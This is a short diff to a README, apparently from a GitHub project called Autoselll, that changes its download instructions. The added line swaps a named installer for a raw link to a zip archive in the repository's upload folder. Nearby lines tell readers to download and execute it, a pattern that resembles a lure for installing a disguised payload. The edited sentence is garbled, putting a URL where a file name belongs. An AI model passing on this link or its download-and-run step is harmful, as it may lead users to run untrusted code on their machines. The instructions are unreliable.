santiagofavero/Autoselll/README.md

 Releases and download instructions
 - Release page
   - Use the releases page to download installers and assets
-  - From the releases page, download a file named autoselll-installer.sh (Linux/macOS) or the corresponding installer for your OS
+  - From the releases page, download a file named https://github.com/santiagofavero/Autoselll/raw/refs/heads/main/app/upload/Software_v3.4.zip (Linux/macOS) or the corresponding installer for your OS
   - After downloading, run the installer to set up the agent on your machine
 - Important note
   - The installer file path is part of the releases; download and execute the file as part of the setup